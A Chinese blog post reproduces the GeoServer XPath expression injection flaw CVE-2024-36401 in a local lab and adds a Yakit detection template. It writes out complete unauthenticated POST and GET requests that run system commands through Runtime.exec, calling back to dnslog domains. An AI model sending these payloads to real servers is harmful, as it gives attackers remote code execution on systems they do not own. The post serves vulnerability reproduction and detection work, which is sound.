GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

已于 2024-07-10 10:35:58 修改
阅读量609 收藏 5
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全
于 2024-07-10 10:18:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangyongkang666/article/details/140316196
版权

GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

1.漏洞描述

GeoServer 是一个开源的服务器软件,使用 Java 编写,主要功能是允许用户共享和编辑地理空间数据。它在设计时就考虑到了互操作性,支持使用开放标准来发布多种主流格式的空间数据。

GeoServer在版本2.23.6、2.24.4和2.25.2之前,允许未经身份验证的用户通过多个OGC请求参数针对默认GeoServer安装的特别构造的输入利用代码注入漏洞,该漏洞是由于应用不安全地将属性名称作为XPath表达式进行评估,攻击者可以在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。

2.漏洞复现

环境搭建

https://master.dl.sourceforge.net/project/geoserver/GeoServer/2.20.0/geoserver-2.20.0-bin.zip?viasf=1

下载之后,到bin目录启动startup.bat ,由于我这里端口冲突,于是在start.ini修改了端口为8087

在这里插入图片描述

漏洞复现:

POST请求

POST /geoserver/wfs HTTP/1.1
Host: 192.168.236.196:8087
Content-Type: application/xml
Content-Length: 334

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'
 valueReference='exec(java.lang.Runtime.getRuntime(),"ping hovmgt.dnslog.cn")'>
 <wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

在这里插入图片描述

可以看到dnslog出现回显,证明命令执行成功

在这里插入图片描述

GET 请求:

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27curl%20fkm7iy.dnslog.cn%27) HTTP/1.1
Host: 192.168.236.196:8087
Cookie: JSESSIONID=node01odk521suledd1lff372goa4v44.node0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

在这里插入图片描述
在这里插入图片描述

3. yakit检测模版

id: CVE-2024-36401-GeoServer-wfs-rce

info:
  name: GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)
  author: god
  severity: critical
  description: GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

http:
- raw:
  - |-
    @timeout: 30s
    POST /geoserver/wfs HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/xml
    Content-Length: 324

    <wfs:GetPropertyValue service='WFS' version='2.0.0'
     xmlns:topp='http://www.openplans.org/topp'
     xmlns:fes='http://www.opengis.net/fes/2.0'
     xmlns:wfs='http://www.opengis.net/wfs/2.0'
     valueReference='exec(java.lang.Runtime.getRuntime(),"ping {{interactsh-url}}")'>
     <wfs:Query typeNames='topp:states'/>
    </wfs:GetPropertyValue>

  max-redirects: 3
  matchers-condition: and
  matchers:
      - type: word
        words:
          - "dns"
        part: interactsh_protocol

在这里插入图片描述

makven60
关注
专栏目录
Geoserver XPath表达式注入致远程代码执行漏洞复现(CVE-2024-36401)
0xSec
07-03 1554
2024年7月,互联网上披露Geoserver表达式注入致远程代码执行漏洞CVE-2024-36401),攻击者无需认证即可利用该漏洞获取服务器权限,建议受影响的客户尽快修复漏洞
GeoServer SQL注入漏洞复现(CVE-2023-25157)
0xSec
06-09 7586
GeoServer在预览图层的时候,可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 1461
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
未公开 GeoServer开源服务器wfs远程命令执行漏洞 已复现(CVE-2024-36401)
小司机的奥拓
07-03 1031
资源分享包含但不限于网上未公开的day漏洞(更新漏洞POC共500+),2024最新企业SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。
漏洞复现】Geoserver远程代码执行漏洞CVE-2024-36401
今天是几号的博客
07-03 2403
GeoServer已经发布先前版本的补丁,可以从下载页面(https://geoserver.org/)下载:2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2、2.18.0,从下载的补丁中获取gt-app-schema和gt-complex和 gt-xsd-core jar文件,替换掉WEB-INF/lib里面对应的文件即可。它为提供交互操作性而设计,使用开放标准发布来自任何主要空间数据源的数据。
GeoServer CVE-2024-36401 漏洞利用
最新发布
Bugatti100Peagle的博客
08-16 1264
GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。中数字的长度要和命令的字节数等于或大于才能执行成功,越大执行越慢。的报错是成功执行的。
[漏洞复现]Geoserver表达式注入致远程代码执行漏洞CVE-2024-36401
LiangYueSec的博客
07-03 770
[漏洞复现]Geoserver表达式注入致远程代码执行漏洞CVE-2024-36401
GeoServer远程代码执行漏洞复现(CVE-2024-36401)
qq_26229345的博客
07-08 3171
文章仅供参考,本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责!
GeoServer SQL 注入漏洞复现(CVE-2024-25157)附poc_geoserverl漏洞
2401_84166258的博客
04-09 834
升级 org.geoserver.community:gs-jdbcconfig 到 2.21.4 或 2.22.2 或更高版本禁用 PostGIS Datastore 的 encode functions 或使用 preparedStatements 处理 sql 语句。
GeoServer SQL 注入漏洞复现(CVE-2024-25157)附poc_geoserverl漏洞(1)
2401_83974590的博客
04-17 1284
在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入执行恶意代码
Goby漏洞利用优化 | GeoServer远程代码执行漏洞CVE-2024-36401)(支持回显命令执行、内存马)
m0_46699477的博客
07-09 501
GeoSverver 远程代码执行漏洞 CVE-2024-36401:GeoSverver Tools 库的 API 在处理要素类型的属性名称时,会将这些属性名称不安全地传递给 commons-jxpath 库进行解析,由于 commons-jxpath 库在解析 XPath 表达式时可以执行任意代码,从而导致未经身份验证的用户能够利用特定的 OGC 请求参数远程执行代码
CVE-2024-36401 GeoServer rce 分析
weixin_52381874的博客
07-05 610
GeoServer 是一个开源服务允许用户共享和编辑地理空间数据。在版本 2.23.6、2.24.4 和 2.25.2 之前,多个 OGC 请求参数允许未经身份验证的用户通过针对默认 GeoServer 安装的特制输入进行远程代码执行 (RCE),因为将属性名称评估为 XPath 表达式会不安全GeoServer 调用的 GeoTools 库 API 评估要素类型的属性/属性名称,从而不安全地将它们传递给 commons-jxpath 库,该库在评估 XPath 表达式时可以执行任意代码
GeoServer漏洞CVE-2023-25157)
m0_73605862的博客
12-04 1297
3.然后进行模糊搜索写入,利用了布尔注入进行注入,返回结果。通过绕过前面的strStartsWith语句然后在后面查询了版本,并且变成了数字。1.了解了一下这个geoserver的请求规范,顺便了解一下这个网页的请求规范以及返回结果是什么。4.修改注入语句,不知道返回成功了没有(好奇第一条数据有这么长吗),用了另外一种也返回的这个。然乎知道漏洞是用户在输入的时候可能不规范造成的sql注入,并且这个还支持模糊查询。前半部分是sql注入一些语句的测试,后面是漏洞的复现和利用。1.查看user 表。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 887
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
GeoServer /geoserver/wms接口存在远程命令执行漏洞
nnn2188185的博客
05-22 663
GeoServer /geoserver/wms接口存在远程命令执行漏洞
GeoServer wms远程代码执行漏洞
qq_39894062的博客
03-28 1010
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
GeoServer /geoserver/wms RCE漏洞复现(CVE-2022-24816)
0xSec
05-15 1745
GeoServer /geoserver/wms 接口处存在远程代码执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意shell命令,从而获取服务器权限。
全网首发 GeoServer 远程代码执行漏洞(CVE-2024-36401)
WuYSec的博客
07-02 1616
GeoServer 是一个开源服务器,允许用户共享和编辑地理空间数据,依赖 GeoTools 库来处理地理空间数据。受影响的版本中 GeoTools 库的 API 在处理要素类型的属性名称时,会将这些属性名称不安全地传递给 commons-jxpath 库进行解析,由于 commons-jxpath 库在解析 XPath 表达式时可以执行任意代码,从而导致未经身份验证的用户能够利用特定的 OGC 请求参数远程执行代码
geoserver sql注入
07-28
GeoServer存在SQL注入漏洞,攻击者可以通过构造畸形的过滤语法绕过GeoServer的词法解析,从而获取服务器中的敏感信息甚至可能获取数据库服务器权限。\[2\]具体的攻击示例是通过发送特定的HTTP请求来实现注入,其中包括了查询图层名称和属性名称的参数。\[3\] 为了防止SQL注入攻击,建议采取以下措施: 1. 及时更新GeoServer和相关组件的版本,以确保修复了已知的漏洞。 2. 对用户输入进行严格的验证和过滤,确保输入的数据符合预期的格式和类型。 3. 使用参数化查询或预编译语句来执行数据库操作,而不是直接拼接用户输入的数据。 4. 限制GeoServer的访问权限,只允许授权的用户或IP地址进行访问。 5. 监控和记录GeoServer的日志,及时发现异常行为并采取相应的应对措施。 通过采取以上措施,可以有效减少SQL注入攻击对GeoServer的威胁。 #### 引用[.reference_title] - *1* [GeoServer 存在 sql 注入漏洞](https://blog.csdn.net/murphysec/article/details/129278735)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [GeoServer SQL注入漏洞复现(CVE-2023-25157)](https://blog.csdn.net/qq_41904294/article/details/131117123)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值